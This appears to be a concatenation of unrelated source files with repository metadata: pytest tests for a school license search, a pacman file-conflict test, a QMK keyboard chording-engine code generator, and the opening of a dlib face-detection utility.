new_license.license_code = "uni:{}".format(uuid4())
if product_id:
new_meta_data.product_id = product_id.replace("*", "sun")
else:
new_meta_data.product_id = str(uuid4())
new_license.product_id = new_meta_data.product_id
new_license.license_school = ou
license_handler.create(new_license)
meta_data_handler.create(new_meta_data)
return new_license.license_code
test_license_codes = {
GOOD_SEARCH: set(),
BAD_SEARCH: set(),
FUZZY_SEARCH: set(),
}
test_license_codes[title].add(__create_license(title=title))
test_license_codes[publisher].add(__create_license(publisher=publisher))
test_license_codes[license_code].add(__create_license(license_code=license_code))
test_license_codes[product_id].add(__create_license(product_id=product_id))
res = license_handler.search_for_licenses(
is_advanced_search=False, pattern=GOOD_SEARCH, school=ou + "_different_school"
)
assert len(res) == 0
res = license_handler.search_for_licenses(is_advanced_search=False, pattern=GOOD_SEARCH, school=ou)
assert (
len(res)
== (
title,
publisher,
license_code,
product_id,
).count(GOOD_SEARCH)
)
assert test_license_codes[GOOD_SEARCH] == set(res_l["licenseCode"] for res_l in res)
res = license_handler.search_for_licenses(is_advanced_search=False, pattern=FUZZY_SEARCH, school=ou)
assert (
len(res)
== (
title,
publisher,
license_code,
product_id,
).count(FUZZY_SEARCH)
)
assert test_license_codes[FUZZY_SEARCH] == set(res_l["licenseCode"] for res_l in res)
# Warning: all combinations take a lot of time
@pytest.mark.parametrize(
"time_from",
[
(None, True),
(datetime.now() - timedelta(days=2), True),
(datetime.now() + timedelta(days=2), False),
],
)
@pytest.mark.parametrize(
"time_to",
[
(None, True),
(datetime.now() - timedelta(days=2), False),
(datetime.now() + timedelta(days=2), True),
],
)
@pytest.mark.parametrize(
"only_available_licenses",
[
(False, True),
(True, False),
],
)
@pytest.mark.parametrize(
"publisher",
[
("", True),
("*vention{}", True),
# ("univention{}", True),
# ("foobar", False),
],
)
@pytest.mark.parametrize(
"license_type",
[
("", True),
(LicenseType.SINGLE, True),
(LicenseType.VOLUME, True),
],
)
@pytest.mark.parametrize(
"user_pattern",
[
("*", True),
("bildungslogin*username", True),
("bildungslogin*firstname", True),
("bildungslogin*lastname", True),
("foobar", False),
],
)
@pytest.mark.parametrize(
"product_id",
[
("*", True),
("*vention{}", True),
# ("univention{}", True),
# ("foobar", False),
],
)
@pytest.mark.parametrize(
"product",
[
("*", True),
("*vention{}", True),
# ("univention{}", True),
("foobar", False),
],
)
@pytest.mark.parametrize(
"license_code",
[
("*", True),
("*vention{}", True),
# ("univention{}", True),
# ("foobar", False),
],
)
def test_search_for_license_advance(
ou,
udm_license_mod,
license_handler,
single_license,
volume_license,
time_from,
time_to,
only_available_licenses,
publisher,
license_type,
user_pattern,
product_id,
product,
license_code,
restrict_to_this_product_id=(
"",
True,
),
):
"""Test advanced search with AND in start period/end period, only available licenses,
user identification, product id (case sensitive), title and license code (case sensitive)"""
if license_type[0] == "":
license_appendix = "*"
elif license_type[0] == LicenseType.SINGLE:
license_appendix = "_single"
elif license_type[0] == LicenseType.VOLUME:
license_appendix = "_volume"
elif license_type[0] == LicenseType.SCHOOL:
license_appendix = "_school"
elif license_type[0] == LicenseType.WORKGROUP:
license_appendix = "_workgroup"
else:
raise RuntimeError
res = license_handler.search_for_licenses(
is_advanced_search=True,
time_to=time_to[0],
time_from=time_from[0],
only_available_licenses=only_available_licenses[0],
publisher=publisher[0].format(license_appendix),
license_types=license_type[0],
user_pattern=user_pattern[0],
product_id=product_id[0].format(license_appendix),
product=product[0].format(license_appendix),
license_code=license_code[0].format(license_appendix),
restrict_to_this_product_id=restrict_to_this_product_id[0],
school=ou + "_different_school",
)
assert len(res) == 0
res = license_handler.search_for_licenses(
is_advanced_search=True,
time_to=time_to[0],
time_from=time_from[0],
only_available_licenses=only_available_licenses[0],
publisher=publisher[0].format(license_appendix),
license_types=license_type[0],
user_pattern=user_pattern[0],
product_id=product_id[0].format(license_appendix),
product=product[0].format(license_appendix),
license_code=license_code[0].format(license_appendix),
restrict_to_this_product_id=restrict_to_this_product_id[0],
school=ou,
)
should_be_found = all(
(
time_to[1],
time_from[1],
only_available_licenses[1] or license_type[0] in (LicenseType.VOLUME, ""),
publisher[1],
license_type[1],
user_pattern[1],
user_pattern[1],
product_id[1],
product[1],
license_code[1],
restrict_to_this_product_id[1],
)
)
result_licenses = set(res_l["licenseCode"] for res_l in res)
if license_type[0] == "":
expected_result = (volume_license.license_code in result_licenses
or single_license.license_code in result_licenses)
elif license_type[0] == LicenseType.SINGLE:
expected_result = single_license.license_code in result_licenses
elif license_type[0] == LicenseType.VOLUME:
expected_result = volume_license.license_code in result_licenses
else:
raise NotImplementedError
assert expected_result == should_be_found
def test_search_for_license_advance_all_empty(
ou,
udm_license_mod,
license_handler,
single_license,
volume_license,
):
test_search_for_license_advance(
ou,
udm_license_mod,
license_handler,
single_license,
volume_license,
("", True),
("", True),
("", True),
("", True),
("", True),
("", True),
("", True),
("", True),
("", True),
)
def test_search_for_license_advance_restricted(
ou,
udm_license_mod,
license_handler,
single_license,
volume_license,
):
test_search_for_license_advance(
ou,
udm_license_mod,
license_handler,
single_license,
volume_license,
("", True),
("", True),
("", True),
("univention{}", True),
("", True),
("", True),
("", True),
("", True),
("", True),
(volume_license.license_code, True),
)
test_search_for_license_advance(
ou,
udm_license_mod,
license_handler,
single_license,
volume_license,
("", True),
("", True),
("", True),
("univention{}", True),
("", True),
("", True),
("", True),
("", True),
("", True),
(volume_license.license_code + "NOT_FOUND", False),
)
| 29 | 109 | 0.644939 |
24ea8852e19ca1d487927323bff9fb53fa48733b
| 510 |
py
|
Python
|
pacman-termux/test/pacman/tests/fileconflict008.py
|
Maxython/pacman-for-termux
|
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
|
[
"MIT"
] | 23 |
2021-05-21T19:11:06.000Z
|
2022-03-31T18:14:20.000Z
|
source/pacman-6.0.1/test/pacman/tests/fileconflict008.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 11 |
2021-05-21T12:08:44.000Z
|
2021-12-21T08:30:08.000Z
|
source/pacman-6.0.1/test/pacman/tests/fileconflict008.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-09-26T08:44:40.000Z
|
2021-09-26T08:44:40.000Z
|
self.description = "Fileconflict file -> dir on package replacement (FS#24904)"
lp = pmpkg("dummy")
lp.files = ["dir/filepath",
"dir/file"]
self.addpkg2db("local", lp)
p1 = pmpkg("replace")
p1.provides = ["dummy"]
p1.replaces = ["dummy"]
p1.files = ["dir/filepath/",
"dir/filepath/file",
"dir/file",
"dir/file2"]
self.addpkg2db("sync", p1)
self.args = "-Su"
self.addrule("PACMAN_RETCODE=0")
self.addrule("!PKG_EXIST=dummy")
self.addrule("PKG_EXIST=replace")
| 23.181818 | 79 | 0.621569 |
707f36b82a8ad751fbd1ca9954370fc867514e75
| 22,873 |
py
|
Python
|
users/dennytom/chording_engine/chord.py
|
fzf/qmk_toolbox
|
10d6b425bd24b45002555022baf16fb11254118b
|
[
"MIT"
] | 2 |
2021-04-16T23:29:01.000Z
|
2021-04-17T02:26:22.000Z
|
users/dennytom/chording_engine/chord.py
|
fzf/qmk_toolbox
|
10d6b425bd24b45002555022baf16fb11254118b
|
[
"MIT"
] | null | null | null |
users/dennytom/chording_engine/chord.py
|
fzf/qmk_toolbox
|
10d6b425bd24b45002555022baf16fb11254118b
|
[
"MIT"
] | null | null | null |
from functools import reduce
import re
strings = []
number_of_strings = -1
def top_level_split(s):
"""
Split `s` by top-level commas only. Commas within parentheses are ignored.
"""
# Parse the string tracking whether the current character is within
# parentheses.
balance = 0
parts = []
part = ""
for i in range(len(s)):
c = s[i]
part += c
if c == '(':
balance += 1
elif c == ')':
balance -= 1
elif c == ',' and balance == 0 and not s[i+1] == ',':
part = part[:-1].strip()
parts.append(part)
part = ""
# Capture last part
if len(part):
parts.append(part.strip())
return parts
def new_chord(on_pseudolayer, keycodes_hash, has_counter, value1, value2, function, output_buffer, index):
counter_link = "NULL"
output_buffer += "uint8_t state_" + str(index) + " = IDLE;\n"
if has_counter:
output_buffer += "uint8_t counter_" + str(index) + " = 0;\n"
counter_link = "&counter_" + str(index)
output_buffer += "const struct Chord chord_" + str(index) + " PROGMEM = {" + keycodes_hash + ", " + on_pseudolayer + ", &state_" + str(index) + ", " + counter_link + ", " + str(value1) + ", " + str(value2) + ", " + function + "};\n"
index += 1
return [output_buffer, index]
def KC(on_pseudolayer, keycodes_hash, keycode, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, keycode, 0, "single_dance", output_buffer, index)
def AS(on_pseudolayer, keycodes_hash, keycode, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, True, keycode, 0, "autoshift_dance", output_buffer, index)
def AT(on_pseudolayer, keycodes_hash, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, 0, 0, "autoshift_toggle", output_buffer, index)
def KL(on_pseudolayer, keycodes_hash, keycode, to_pseudolayer, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, True, keycode, to_pseudolayer, "key_layer_dance", output_buffer, index)
def KK(on_pseudolayer, keycodes_hash, keycode1, keycode2, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, True, keycode1, keycode2, "key_key_dance", output_buffer, index)
def KM(on_pseudolayer, keycodes_hash, keycode, to_pseudolayer, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, keycode, to_pseudolayer, "key_mod_dance", output_buffer, index)
def MO(on_pseudolayer, keycodes_hash, to_pseudolayer, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, to_pseudolayer, 0, "temp_pseudolayer", output_buffer, index)
def MO_alt(on_pseudolayer, keycodes_hash, from_pseudolayer, to_pseudolayer, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, to_pseudolayer, from_pseudolayer, "temp_pseudolayer_alt", output_buffer, index)
def LOCK(on_pseudolayer, keycodes_hash, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, 0, 0, "lock", output_buffer, index)
def DF(on_pseudolayer, keycodes_hash, to_pseudolayer, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, to_pseudolayer, 0, "perm_pseudolayer", output_buffer, index)
def TO(on_pseudolayer, keycodes_hash, to_pseudolayer, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, to_pseudolayer, 0, "switch_layer", output_buffer, index)
def OSK(on_pseudolayer, keycodes_hash, keycode, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, keycode, 0, "one_shot_key", output_buffer, index)
def OSL(on_pseudolayer, keycodes_hash, to_pseudolayer, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, to_pseudolayer, 0, "one_shot_layer", output_buffer, index)
def CMD(on_pseudolayer, keycodes_hash, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, 0, 0, "command", output_buffer, index)
def DM_RECORD(on_pseudolayer, keycodes_hash, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, 0, 0, "dynamic_macro_record", output_buffer, index)
def DM_NEXT(on_pseudolayer, keycodes_hash, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, 0, 0, "dynamic_macro_next", output_buffer, index)
def DM_END(on_pseudolayer, keycodes_hash, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, 0, 0, "dynamic_macro_end", output_buffer, index)
def DM_PLAY(on_pseudolayer, keycodes_hash, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, 0, 0, "dynamic_macro_play", output_buffer, index)
def LEAD(on_pseudolayer, keycodes_hash, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, 0, 0, "leader", output_buffer, index)
def CLEAR(on_pseudolayer, keycodes_hash, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, 0, 0, "clear", output_buffer, index)
def RESET(on_pseudolayer, keycodes_hash, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, 0, 0, "reset", output_buffer, index)
def STR(on_pseudolayer, keycodes_hash, string_input, output_buffer, index, number_of_strings, strings):
[a, b] = new_chord(on_pseudolayer, keycodes_hash, False, number_of_strings, 0, "string_in", output_buffer, index)
return [a, b, number_of_strings + 1, strings + [string_input]]
def M(on_pseudolayer, keycodes_hash, value1, value2, fnc, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, True, value1, value2, fnc, output_buffer, index)
def expand_keycode_fnc(DEFINITION):
if DEFINITION == "`":
DEFINITION = "GRAVE"
elif DEFINITION == "-":
DEFINITION = "MINUS"
elif DEFINITION == "=":
DEFINITION = "EQUAL"
elif DEFINITION == "[":
DEFINITION = "LBRACKET"
elif DEFINITION == "]":
DEFINITION = "RBRACKET"
elif DEFINITION == "\\":
DEFINITION = "BSLASH"
elif DEFINITION == ";":
DEFINITION = "SCOLON"
elif DEFINITION == "'":
DEFINITION = "QUOTE"
elif DEFINITION == ",":
DEFINITION = "COMMA"
elif DEFINITION == ".":
DEFINITION = "DOT"
elif DEFINITION == "/":
DEFINITION = "SLASH"
elif DEFINITION == "~":
DEFINITION = "TILDE"
elif DEFINITION == "*":
DEFINITION = "ASTERISK"
elif DEFINITION == "+":
DEFINITION = "PLUS"
elif DEFINITION == "(":
DEFINITION = "LEFT_PAREN"
elif DEFINITION == ")":
DEFINITION = "RIGHT_PAREN"
elif DEFINITION == "<":
DEFINITION = "LEFT_ANGLE_BRACKET"
elif DEFINITION == ">":
DEFINITION = "RIGHT_ANGLE_BRACKET"
elif DEFINITION == "{":
DEFINITION = "LEFT_CURLY_BRACE"
elif DEFINITION == "}":
DEFINITION = "RIGHT_CURLY_BRACE"
elif DEFINITION == "?":
DEFINITION = "QUESTION"
elif DEFINITION == "~":
DEFINITION = "TILDE"
elif DEFINITION == ":":
DEFINITION = "COLON"
elif DEFINITION == "_":
DEFINITION = "UNDERSCORE"
elif DEFINITION == '"':
DEFINITION = "DOUBLE_QUOTE"
elif DEFINITION == "@":
DEFINITION = "AT"
elif DEFINITION == "#":
DEFINITION = "HASH"
elif DEFINITION == "$":
DEFINITION = "DOLLAR"
elif DEFINITION == "!":
DEFINITION = "EXCLAIM"
elif DEFINITION == "%":
DEFINITION = "PERCENT"
elif DEFINITION == "^":
DEFINITION = "CIRCUMFLEX"
elif DEFINITION == "&":
DEFINITION = "AMPERSAND"
elif DEFINITION == "|":
DEFINITION = "PIPE"
if DEFINITION in [
"A", "a", "B", "b", "C", "c", "D", "d", "E", "e",
"F", "f", "G", "g", "H", "h", "I", "i", "J", "j",
"K", "k", "L", "l", "M", "m", "N", "n", "O", "o",
"P", "p", "Q", "q", "R", "r", "S", "s", "T", "t",
"U", "u", "V", "v", "W", "w", "X", "x", "Y", "y",
"Z", "z", "1", "2", "3", "4", "5", "6", "7", "8",
"9", "0", "F1", "F2", "F3", "F4", "F5", "F6", "F7",
"F8", "F9", "F10", "F11", "F12", "F13", "F14", "F15",
"F16", "F17", "F18", "F19", "F20", "F21", "F22",
"F23", "F24", "ENTER", "ENT", "ESCAPE", "ESC",
"BSPACE", "BSPC", "TAB", "SPACE", "SPC", "NONUS_HASH",
"NUHS", "NONUS_BSLASH", "NUBS", "COMMA", "COMM",
"DOT", "SLASH", "SLSH", "TILDE", "TILD", "EXCLAIM",
"EXLM", "AT", "HASH", "DOLLAR", "DLR", "PERCENT",
"PERC", "CIRCUMFLEX", "CIRC", "AMPERSAND", "AMPR",
"ASTERISK", "ASTR", "LEFT_PAREN", "LPRN", "RIGHT_PAREN",
"RPRN", "UNDERSCORE", "UNDS", "PLUS", "LEFT_CURLY_BRACE",
"LCBR", "RIGHT_CURLY_BRACE", "RCBR", "PIPE", "COLON",
"COLN", "DOUBLE_QUOTE", "DQUO", "DQT",
"LEFT_ANGLE_BRACKET", "LABK", "LT", "RIGHT_ANGLE_BRACKET",
"RABK", "GT", "QUESTION", "QUES", "SCOLON", "SCLN",
"QUOTE", "QUOT", "LBRACKET", "LBRC", "RBRACKET", "RBRC",
"BSLASH", "BSLS", "MINUS", "MINS", "EQUAL", "EQL",
"GRAVE", "GRV", "ZKHK", "CAPSLOCK", "CLCK", "CAPS",
"SCROLLOCK", "SLCK", "BRMD", "NUMLOCK", "NLCK",
"LOCKING_CAPS", "LCAP", "LOCKING_NUM", "LNUM",
"LOCKING_SCROLL", "LSCR", "LCTRL", "LCTL", "LSHIFT",
"LSFT", "LALT", "LGUI", "LCMD", "LWIN", "RCTRL",
"RCTL", "RSHIFT", "RSFT", "RALT", "RGUI", "RCMD",
"RWIN", "INT1", "RO", "INT2", "KANA", "INT3", "JYEN",
"INT4", "HENK", "INT5", "MHEN", "INT6", "INT7",
"INT8", "INT9", "LANG1", "HAEN", "LANG2", "HANJ",
"LANG3", "LANG4", "LANG5", "LANG6", "LANG7", "LANG8",
"LANG9", "PSCREEN", "PSCR", "PAUSE", "PAUS", "BRK",
"BRMU", "INSERT", "INS", "HOME", "PGUP", "DELETE",
"DEL", "END", "PGDOWN", "PGDN", "RIGHT", "RGHT",
"LEFT", "DOWN", "UP", "APPLICATION", "APP", "POWER",
"EXECUTE", "EXEC", "HELP", "MENU", "SELECT", "SLCT",
"STOP", "AGAIN", "AGIN", "UNDO", "CUT", "COPY",
"PASTE", "PSTE", "FIND", "MUTE", "VOLUP", "VOLDOWN",
"ALT_ERASE", "ERAS", "SYSREQ", "CANCEL", "CLEAR",
"CLR", "PRIOR", "RETURN", "SEPARATOR", "OUT", "OPER",
"CLEAR_AGAIN", "CRSEL", "EXSEL", "SYSTEM_POWER",
"PWR", "SYSTEM_SLEEP", "SLEP", "SYSTEM_WAKE", "WAKE",
"AUDIO_MUTE", "MUTE", "AUDIO_VOL_UP", "VOLU",
"AUDIO_VOL_DOWN", "VOLD", "MEDIA_NEXT_TRACK", "MNXT",
"MEDIA_PREV_TRACK", "MPRV", "CPRV", "MEDIA_STOP", "MSTP",
"MEDIA_PLAY_PAUSE", "MPLY", "MEDIA_SELECT", "MSEL",
"MEDIA_EJECT", "EJCT", "MAIL", "CALCULATOR", "CALC",
"MY_COMPUTER", "MYCM", "WWW_SEARCH", "WSCH", "WWW_HOME",
"WHOM", "WWW_BACK", "WBAK", "WWW_FORWARD", "WFWD",
"WWW_STOP", "WSTP", "WWW_REFRESH", "WREF",
"WWW_FAVORITES", "WFAV", "MEDIA_FAST_FORWARD", "MFFD",
"MEDIA_REWIND", "MRWD", "BRIGHTNESS_UP", "BRIU",
"BRIGHTNESS_DOWN", "BRID", "KP_SLASH", "PSLS",
"KP_ASTERISK", "PAST", "KP_MINUS", "PMNS", "KP_PLUS",
"PPLS", "KP_ENTER", "PENT", "KP_1", "P1", "KP_2", "P2",
"KP_3", "P3", "KP_4", "P4", "KP_5", "P5", "KP_6", "P6",
"KP_7", "P7", "KP_8", "P8", "KP_9", "P9", "KP_0", "P0",
"KP_DOT", "PDOT", "KP_EQUAL", "PEQL", "KP_COMMA", "PCMM",
"MS_BTN1", "BTN1", "MS_BTN2", "BTN2", "MS_BTN3", "BTN3",
"MS_BTN4", "BTN4", "MS_BTN5", "BTN5", "MS_BTN6", "BTN6",
"MS_LEFT", "MS_L", "MS_DOWN", "MS_D", "MS_UP", "MS_U",
"MS_RIGHT", "MS_R", "MS_WH_UP", "WH_U", "MS_WH_DOWN",
"WH_D", "MS_WH_LEFT", "MS_WH_L", "MS_WH_RIGHT", "MS_WH_R",
"KC_MS_ACCEL0", "ACL0", "KC_MS_ACCEL1", "ACL1",
"KC_MS_ACCEL2", "ACL2"
]:
return "KC_" + DEFINITION
else:
return DEFINITION
def MK(on_pseudolayer, keycodes_hash, definition, output_buffer, index):
l = len(definition.split(', '))
output_buffer += "void function_" + str(index) + "(const struct Chord* self) {\n"
output_buffer += " switch (*self->state) {\n"
output_buffer += " case ACTIVATED:\n"
for i in range(0, l):
val = definition.split(',')[i].strip()
code = expand_keycode_fnc(val)
output_buffer += " key_in(" + code + ");\n"
output_buffer += " break;\n"
output_buffer += " case DEACTIVATED:\n"
for i in range(0, l):
val = definition.split(',')[i].strip()
code = expand_keycode_fnc(val)
output_buffer += " key_out(" + code + ");\n"
output_buffer += " *self->state = IDLE;\n"
output_buffer += " break;\n"
output_buffer += " case RESTART:\n"
for i in range(0, l):
val = definition.split(',')[i].strip()
code = expand_keycode_fnc(val)
output_buffer += " key_out(" + code + ");\n"
output_buffer += " break;\n"
output_buffer += " default:\n"
output_buffer += " break;\n"
output_buffer += " };\n"
output_buffer += "}\n"
return new_chord(on_pseudolayer, keycodes_hash, True, 0, 0, "function_" + str(index), output_buffer, index)
def D(on_pseudolayer, keycodes_hash, DEFINITION, output_buffer, index):
l = len(DEFINITION.split(','))
output_buffer += "void function_" + str(index) + "(const struct Chord* self) {\n"
output_buffer += " switch (*self->state) {\n"
output_buffer += " case ACTIVATED:\n"
output_buffer += " *self->counter = *self->counter + 1;\n"
output_buffer += " break;\n"
output_buffer += " case PRESS_FROM_ACTIVE:\n"
output_buffer += " switch (*self->counter) {\n"
for i in range(0, l):
val = DEFINITION.split(',')[i].strip()
code = expand_keycode_fnc(val)
output_buffer += " case " + str(i + 1) + ":\n"
output_buffer += " key_in( " + code + ");\n"
output_buffer += " break;\n"
output_buffer += " default:\n"
output_buffer += " break;\n"
output_buffer += " }\n"
output_buffer += " *self->state = FINISHED_FROM_ACTIVE;\n"
output_buffer += " break;\n"
output_buffer += " case FINISHED:\n"
output_buffer += " switch (*self->counter) {\n"
for i in range(0, l):
val = DEFINITION.split(',')[i].strip()
code = expand_keycode_fnc(val)
output_buffer += " case " + str(i + 1) + ":\n"
output_buffer += " tap_key( " + code + ");\n"
output_buffer += " break;\n"
output_buffer += " default:\n"
output_buffer += " break;\n"
output_buffer += " }\n"
output_buffer += " *self->counter = 0;\n"
output_buffer += " *self->state = IDLE;\n"
output_buffer += " break;\n"
output_buffer += " case RESTART:\n"
output_buffer += " switch (*self->counter) {\n"
for i in range(0, l):
val = DEFINITION.split(',')[i].strip()
code = expand_keycode_fnc(val)
output_buffer += " case " + str(i + 1) + ":\n"
output_buffer += " key_out( " + code + ");\n"
output_buffer += " break;\n"
output_buffer += " default:\n"
output_buffer += " break;\n"
output_buffer += " }\n"
output_buffer += " *self->counter = 0;\n"
output_buffer += " break;\n"
output_buffer += " default:\n"
output_buffer += " break;\n"
output_buffer += " }\n"
output_buffer += "}\n"
return new_chord(on_pseudolayer, keycodes_hash, True, 0, 0, "function_" + str(index), output_buffer, index)
def O(on_pseudolayer, keycodes_hash, DEFINITION, output_buffer, index):
if DEFINITION[0:3] == "KC_":
return OSK(on_pseudolayer, keycodes_hash, DEFINITION, output_buffer, index)
else:
return OSL(on_pseudolayer, keycodes_hash, DEFINITION, output_buffer, index)
def add_key(PSEUDOLAYER, KEYCODES_HASH, DEFINITION, output_buffer, index, number_of_strings, strings):
# if "= {" + KEYCODES_HASH + ", " + PSEUDOLAYER in output_buffer:
# KEYCODES_HASH = re.sub('H_', '', KEYCODES_HASH)
# raise Exception("You are trying to register a chord that you already registered (" + KEYCODES_HASH + ", " + PSEUDOLAYER + ")")
if DEFINITION == "":
return [output_buffer, index, number_of_strings, strings]
else:
split = DEFINITION.split("(")
type = split[0].strip()
if len(split) == 1:
if type == "LOCK":
[output_buffer, index] = LOCK(PSEUDOLAYER, KEYCODES_HASH, output_buffer, index)
elif type == "AT":
[output_buffer, index] = AT(PSEUDOLAYER, KEYCODES_HASH, output_buffer, index)
elif type == "CMD":
[output_buffer, index] = CMD(PSEUDOLAYER, KEYCODES_HASH, output_buffer, index)
elif type == "LEAD":
[output_buffer, index] = LEAD(PSEUDOLAYER, KEYCODES_HASH, output_buffer, index)
elif type == "DM_RECORD":
[output_buffer, index] = DM_RECORD(PSEUDOLAYER, KEYCODES_HASH, output_buffer, index)
elif type == "DM_NEXT":
[output_buffer, index] = DM_NEXT(PSEUDOLAYER, KEYCODES_HASH, output_buffer, index)
elif type == "DM_END":
[output_buffer, index] = DM_END(PSEUDOLAYER, KEYCODES_HASH, output_buffer, index)
elif type == "DM_PLAY":
[output_buffer, index] = DM_PLAY(PSEUDOLAYER, KEYCODES_HASH, output_buffer, index)
elif type == "CLEAR_KB":
[output_buffer, index] = CLEAR(PSEUDOLAYER, KEYCODES_HASH, output_buffer, index)
elif type == "RESET":
[output_buffer, index] = RESET(PSEUDOLAYER, KEYCODES_HASH, output_buffer, index)
else:
code = expand_keycode_fnc(type)
[output_buffer, index] = KC(PSEUDOLAYER, KEYCODES_HASH, code, output_buffer, index)
else:
val = split[1][:-1].strip()
if type == "O":
code = expand_keycode_fnc(val)
[output_buffer, index] = O(PSEUDOLAYER, KEYCODES_HASH, code, output_buffer, index)
elif type == "D":
[output_buffer, index] = D(PSEUDOLAYER, KEYCODES_HASH, val, output_buffer, index)
elif type == "MK":
[output_buffer, index] = MK(PSEUDOLAYER, KEYCODES_HASH, val, output_buffer, index)
elif type == "M":
fnc = val.split(',')[0].strip()
val1 = val.split(',')[1].strip()
val2 = val.split(',')[2].strip()
[output_buffer, index] = M(PSEUDOLAYER, KEYCODES_HASH, val1, val2, fnc, output_buffer, index)
elif type == "KK":
val1 = val.split(',')[0].strip()
code1 = expand_keycode_fnc(val1)
val2 = val.split(',')[1].strip()
code2 = expand_keycode_fnc(val2)
[output_buffer, index] = KK(PSEUDOLAYER, KEYCODES_HASH, code1, code2, output_buffer, index)
elif type == "KL":
val1 = val.split(',')[0].strip()
code1 = expand_keycode_fnc(val1)
val2 = val.split(',')[1].strip()
[output_buffer, index] = KL(PSEUDOLAYER, KEYCODES_HASH, code1, val2, output_buffer, index)
elif type == "KM":
val1 = val.split(',')[0].strip()
code1 = expand_keycode_fnc(val1)
val2 = val.split(',')[1].strip()
code2 = expand_keycode_fnc(val2)
[output_buffer, index] = KM(PSEUDOLAYER, KEYCODES_HASH, code1, code2, output_buffer, index)
elif type == "AS":
code = expand_keycode_fnc(val)
[output_buffer, index] = AS(PSEUDOLAYER, KEYCODES_HASH, code, output_buffer, index)
elif type == "MO":
if not ',' in val:
[output_buffer, index] = MO(PSEUDOLAYER, KEYCODES_HASH, val, output_buffer, index)
else:
val1 = val.split(',')[0].strip()
val2 = val.split(',')[1].strip()
[output_buffer, index] = MO_alt(PSEUDOLAYER, KEYCODES_HASH, val1, val2, output_buffer, index)
elif type == "DF":
[output_buffer, index] = DF(PSEUDOLAYER, KEYCODES_HASH, val, output_buffer, index)
elif type == "TO":
[output_buffer, index] = TO(PSEUDOLAYER, KEYCODES_HASH, val, output_buffer, index)
elif type == "STR":
[output_buffer, index, number_of_strings, strings] = STR(PSEUDOLAYER, KEYCODES_HASH, val, output_buffer, index, number_of_strings, strings)
return [output_buffer, index, number_of_strings, strings]
def add_leader_combo(DEFINITION, FUNCTION):
return list_of_leader_combos.append([DEFINITION, FUNCTION])
def add_chord_set(PSEUDOLAYER, INPUT_STRING, TYPE, data, output_buffer, index, number_of_strings, strings):
chord_set = {}
for set in data["chord_sets"]:
if set["name"] == TYPE:
chord_set = set["chords"]
break
separated_string = top_level_split(INPUT_STRING)
for word, chord in zip(separated_string, chord_set):
chord_hash = reduce((lambda x, y: str(x) + " + " + str(y)), ["H_" + key for key in chord])
[output_buffer, index, number_of_strings, strings] = add_key(PSEUDOLAYER, chord_hash, word, output_buffer, index, number_of_strings, strings)
return [output_buffer, index, number_of_strings, strings]
def add_dictionary(PSEUDOLAYER, keycodes, array, output_buffer, index, number_of_strings, strings):
for chord in array:
hash = ""
for word, key in zip(chord[:-1], keycodes):
if word == "X":
hash = hash + " + H_" + key
hash = hash[3:]
if hash != "":
[output_buffer, index, number_of_strings, strings] = add_key(PSEUDOLAYER, hash, chord[-1], output_buffer, index, number_of_strings, strings)
return [output_buffer, index, number_of_strings, strings]
def secret_chord(PSEUDOLAYER, ACTION, INPUT_STRING, data, output_buffer, index, number_of_strings, strings):
separated_string = top_level_split(INPUT_STRING)
hash = ""
for word, key in zip(separated_string, data["keys"]):
if word == "X":
hash = hash + " + H_" + key
hash = hash[3:]
if hash != "":
return add_key(PSEUDOLAYER, hash, ACTION, output_buffer, index, number_of_strings, strings)
| 49.083691 | 236 | 0.584707 |
3b96f39ea7dcb39fdda641725af35ecfec6ef0f3
| 5,724 |
py
|
Python
|
src/util.py
|
corganhejijun/FaceFill
|
6914f3ee680b41161817fe5eafc09b82e59d9113
|
[
"MIT"
] | null | null | null |
src/util.py
|
corganhejijun/FaceFill
|
6914f3ee680b41161817fe5eafc09b82e59d9113
|
[
"MIT"
] | null | null | null |
src/util.py
|
corganhejijun/FaceFill
|
6914f3ee680b41161817fe5eafc09b82e59d9113
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import cv2
import os
import dlib
from scipy import misc
import numpy as np
from PIL import Image
def getBound(img, shape):
xMin = len(img[0])
xMax = 0
yMin = len(img)
yMax = 0
for i in range(shape.num_parts):
if (shape.part(i).x < xMin):
xMin = shape.part(i).x
if (shape.part(i).x > xMax):
xMax = shape.part(i).x
if (shape.part(i).y < yMin):
yMin = shape.part(i).y
if (shape.part(i).y > yMax):
yMax = shape.part(i).y
return xMin, xMax, yMin, yMax
def combineImg(imga, imgb):
target = Image.new('RGB', (imga.shape[0]*2, imga.shape[1]))
target.paste(Image.fromarray(np.uint8(imga)), (0, 0))
target.paste(Image.fromarray(np.uint8(imgb)), (imgb.shape[0] + 1, 0))
return target
def getFace(detector, shapePredict, img):
dets = detector(img, 1)
if (len(dets) == 0):
return None, None, None, None
det = dets[0]
shape = shapePredict(img, det)
xmin, xmax, ymin, ymax = getBound(img, shape)
if xmin < 0 or xmax < 0 or ymin < 0 or ymax < 0:
return None, None, None, None
